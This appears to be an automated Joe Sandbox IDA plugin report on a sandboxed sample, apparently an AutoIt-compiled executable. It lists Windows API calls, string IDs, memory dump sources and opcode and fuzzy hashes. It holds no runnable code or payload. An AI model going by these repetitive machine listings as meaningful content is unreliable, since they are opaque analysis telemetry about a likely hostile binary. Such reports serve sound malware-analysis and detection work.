                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00132830
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0013283B
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00132843
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0013284B
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 1423608774-0
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00177C07
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00177C1D
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00177C2C
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00177C3B
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00177C45
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00177C4C
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,?), ref: 00179A33
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 00179A44
                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,001A5DEE,?,?,?,?,?,0013ED63), ref: 00179A51
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,001A5DEE,?,?,?,?,?,0013ED63), ref: 00179A5E
                                      • Part of subcall function 001793D1: CloseHandle.KERNEL32(?,?,00179A6B,?,?,?,001A5DEE,?,?,?,?,?,0013ED63), ref: 001793DB
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00179A71
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00179A78
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 0018B006
                                    • CharUpperBuffW.USER32(?,?), ref: 0018B115
                                    • VariantClear.OLEAUT32(?), ref: 0018B298
                                      • Part of subcall function 00179DC5: VariantInit.OLEAUT32(00000000), ref: 00179E05
                                      • Part of subcall function 00179DC5: VariantCopy.OLEAUT32(?,?), ref: 00179E0E
                                      • Part of subcall function 00179DC5: VariantClear.OLEAUT32(?), ref: 00179E1A
                                    Strings
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4237274167-1221869570
                                    APIs
                                      • Part of subcall function 0014C6F4: _wcscpy.LIBCMT ref: 0014C717
                                    • _memset.LIBCMT ref: 00175438
                                    • GetMenuItemInfoW.USER32(?), ref: 00175467
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00175513
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0017553D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                    • String ID: 0
                                    • API String ID: 4152858687-4108050209
                                    • Opcode ID: b96db6f276cec3b04cb83cad8ab117db67e72c48a0819335a03f95d0465bae12
                                    • Instruction ID: 4a299cb64fe1f3a108ce6c00458c3090bfb500aa7e40ec0356d0d32cdf15d431
                                    • Opcode Fuzzy Hash: b96db6f276cec3b04cb83cad8ab117db67e72c48a0819335a03f95d0465bae12
                                    • Instruction Fuzzy Hash: 5F51F1716047019BD714DB28C8456BBBBFAAB95364F14862DF8AED31A0EBF0CD448B52
                                    APIs
                                    • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0017027B
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001702B1
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001702C2
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00170344
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: 5c77f40928952f5a92644fe78a24b825c8b492e4c3ebf932ac7ce624c7b1736d
                                    • Instruction ID: ed4dedd1caf972fe80ae2ec21d39a2d685aa1a6680e77a0a2748e87334bc5418
                                    • Opcode Fuzzy Hash: 5c77f40928952f5a92644fe78a24b825c8b492e4c3ebf932ac7ce624c7b1736d
                                    • Instruction Fuzzy Hash: 5C415D71600704EFDB0ACF64C885BAA7BB9FF48314B15C0A9E90D9F246D7B5DA44CBA0
                                    APIs
                                    • _memset.LIBCMT ref: 00175075
                                    • GetMenuItemInfoW.USER32 ref: 00175091
                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 001750D7
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001F1708,00000000), ref: 00175120
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem_memset
                                    • String ID: 0
                                    • API String ID: 1173514356-4108050209
                                    • Opcode ID: fee3f12f47c30ef70381efea8087a63455f974ddbd9cf62dbf5adefb6c9cb437
                                    • Instruction ID: e73cdc16cd80f2490db29d7b88140d5dfd69c3e29ac854482ee670b7f56eee5a
                                    • Opcode Fuzzy Hash: fee3f12f47c30ef70381efea8087a63455f974ddbd9cf62dbf5adefb6c9cb437
                                    • Instruction Fuzzy Hash: 9541E3302047019FD724DF28DC85B2ABBF6AF85315F04861EF96997291D7B0E840CB62
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0017E742
                                    • GetLastError.KERNEL32(?,00000000), ref: 0017E768
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0017E78D
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0017E7B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID: p1Wu`KXu
                                    • API String ID: 3321077145-4063981602
                                    • Opcode ID: a3059f933089f42b5f68119bc186d08ca7d59c5fd4b635f748fa7561ac6528e2
                                    • Instruction ID: eeb9a70c0313f65c0e88a379a0d373b64c429fa7007678a20e6b21e352ba66bb
                                    • Opcode Fuzzy Hash: a3059f933089f42b5f68119bc186d08ca7d59c5fd4b635f748fa7561ac6528e2
                                    • Instruction Fuzzy Hash: 904105396006109FCB15EF25C48594DBBF5BFA9720F198498E94AAB3A2CB70FD408B91
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00190587
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharLower
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 2358735015-567219261
                                    • Opcode ID: 3f6eb177c14b637f41a99fe3cf14fe04573ff99248f2757c1c796d20d16e1319
                                    • Instruction ID: b06bbfaa193702e856bba163615d025380e83a9162292b83188ac8d417512b92
                                    • Opcode Fuzzy Hash: 3f6eb177c14b637f41a99fe3cf14fe04573ff99248f2757c1c796d20d16e1319
                                    • Instruction Fuzzy Hash: 3E31A270A00616AFCF01EF58CD919EEB3B8FF65314F108629E866A76D1DB71E915CB80
                                    APIs
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0016B88E
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0016B8A1
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 0016B8D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: ef822a07336a2118367d2f474c4b225530364d8b1c685554190849a356105061
                                    • Instruction ID: 1a605d287bec08f537cc017963383c78fa3490886e639fe8533ef8b11a86ab46
                                    • Opcode Fuzzy Hash: ef822a07336a2118367d2f474c4b225530364d8b1c685554190849a356105061
                                    • Instruction Fuzzy Hash: 2121EF72A00108BFDB18ABA8DC86DFEB77CDF55350F104229F422A71E0EB744D5A9B60
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00184401
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00184427
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00184457
                                    • InternetCloseHandle.WININET(00000000), ref: 0018449E
                                      • Part of subcall function 00185052: GetLastError.KERNEL32(?,?,001843CC,00000000,00000000,00000001), ref: 00185067
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 1951874230-3916222277
                                    • Opcode ID: a8c06209b1ffd58c697aff179a39955f0ca89550c5002b7255a6efb32d908866
                                    • Instruction ID: bbb004afde656c1bc1af1b08e262ee221b68fba9ea55b88f42b968b13c29216f
                                    • Opcode Fuzzy Hash: a8c06209b1ffd58c697aff179a39955f0ca89550c5002b7255a6efb32d908866
                                    • Instruction Fuzzy Hash: 0921CFB6600209BFE715AF54DC85FBFBAECEB48748F10811AF109A2140EF648E059B70
                                    APIs
                                      • Part of subcall function 0014D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0014D1BA
                                      • Part of subcall function 0014D17C: GetStockObject.GDI32(00000011), ref: 0014D1CE
                                      • Part of subcall function 0014D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0014D1D8
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0019915C
                                    • LoadLibraryW.KERNEL32(?), ref: 00199163
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00199178
                                    • DestroyWindow.USER32(?), ref: 00199180
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                    • String ID: SysAnimate32
                                    • API String ID: 4146253029-1011021900
                                    • Opcode ID: 67afed0f99068c6c4ccd77f066c34404aceb5502b21dbd723b1de3865f9a17a2
                                    • Instruction ID: 316455aceec2fc2a8f8af468338fc852c6ca6ea002ee61f7d8f2de1fc7a85a06
                                    • Opcode Fuzzy Hash: 67afed0f99068c6c4ccd77f066c34404aceb5502b21dbd723b1de3865f9a17a2
                                    • Instruction Fuzzy Hash: 69219D71200206BBEF204E69DC89EBA37ADFF99374F10062DF914961A0D772DC51A761
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 00179588
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001795B9
                                    • GetStdHandle.KERNEL32(0000000C), ref: 001795CB
                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00179605
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: 6d941fe4b52bb8eb6a5e091893ee547607d6e26e293301007d44c4157f17b1be
                                    • Instruction ID: 598b85bb9e3beddd85b187f1b9fdc4b904e6c8a68069b5397d85c58bf0d56240
                                    • Opcode Fuzzy Hash: 6d941fe4b52bb8eb6a5e091893ee547607d6e26e293301007d44c4157f17b1be
                                    • Instruction Fuzzy Hash: 6D219270500216ABDB259F25DC05A9E7BF4AF55724F208A1AF8A9D72D0D770D948CB10
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 00179653
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00179683
                                    • GetStdHandle.KERNEL32(000000F6), ref: 00179694
                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001796CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: 3888603d60686142553fb94b72a817d51a10f7c574459406defa2d7857ca8407
                                    • Instruction ID: fcd1ff260c48d6f86fa46ea7635970859d2ef03d8136d8fa7f7acb1afa4eb6c9
                                    • Opcode Fuzzy Hash: 3888603d60686142553fb94b72a817d51a10f7c574459406defa2d7857ca8407
                                    • Instruction Fuzzy Hash: F121C2716002069BDB249F699C05E9EB7F8AF54734F208B18FCA5E72D0E770D889CB50
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0017DB0A
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0017DB5E
                                    • __swprintf.LIBCMT ref: 0017DB77
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,001CDC00), ref: 0017DBB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume__swprintf
                                    • String ID: %lu
                                    • API String ID: 3164766367-685833217
                                    • Opcode ID: 88876973c6fc538327b26af382ec1f78de1e4c60133470e5084051e0a42c711e
                                    • Instruction ID: 2eb98b677303ce1f91fbb3baf4019153dab89a1434f9b86b99357eb44c81a7bf
                                    • Opcode Fuzzy Hash: 88876973c6fc538327b26af382ec1f78de1e4c60133470e5084051e0a42c711e
                                    • Instruction Fuzzy Hash: E1219535600108AFCB14EFA4DD85EAEB7B8EF59704F104069F909E7251DB70EA45CB61
                                    APIs
                                      • Part of subcall function 0016C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0016C84A
                                      • Part of subcall function 0016C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0016C85D
                                      • Part of subcall function 0016C82D: GetCurrentThreadId.KERNEL32 ref: 0016C864
                                      • Part of subcall function 0016C82D: AttachThreadInput.USER32(00000000), ref: 0016C86B
                                    • GetFocus.USER32 ref: 0016CA05
                                      • Part of subcall function 0016C876: GetParent.USER32(?), ref: 0016C884
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0016CA4E
                                    • EnumChildWindows.USER32(?,0016CAC4), ref: 0016CA76
                                    • __swprintf.LIBCMT ref: 0016CA90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                    • String ID: %s%d
                                    • API String ID: 3187004680-1110647743
                                    • Opcode ID: 14228b9563abeef592b1768acde177d265d8b50fb12de9151c5285906dace731
                                    • Instruction ID: 905868439bae96d8cc429706f4fbb21335cb8ddef86ed0203b6a9eb2ef050a0b
                                    • Opcode Fuzzy Hash: 14228b9563abeef592b1768acde177d265d8b50fb12de9151c5285906dace731
                                    • Instruction Fuzzy Hash: D11181716002097BCB15BFA0DC85FFA376DAF54714F00806AFE58AB182DB749955DBB0
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001919F3
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00191A26
                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00191B49
                                    • CloseHandle.KERNEL32(?), ref: 00191BBF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                    • String ID:
                                    • API String ID: 2364364464-0
                                    • Opcode ID: ed8e2102f5f20819001859be68c8bed5e0a7353134fd9cfaa8ff613de49d7a1c
                                    • Instruction ID: 48047c57814e7a85ad57c5a5a3d6bc8f174f73022510e4c4bfaa3d8ae78b78c5
                                    • Opcode Fuzzy Hash: ed8e2102f5f20819001859be68c8bed5e0a7353134fd9cfaa8ff613de49d7a1c
                                    • Instruction Fuzzy Hash: 9B818370A00205ABDF14DF64C886BADBBF5FF18720F148459F909AF392D7B4A981CB90
                                    APIs
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0019E1D5
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0019E20D
                                    • IsDlgButtonChecked.USER32(?,00000001), ref: 0019E248
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0019E269
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0019E281
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
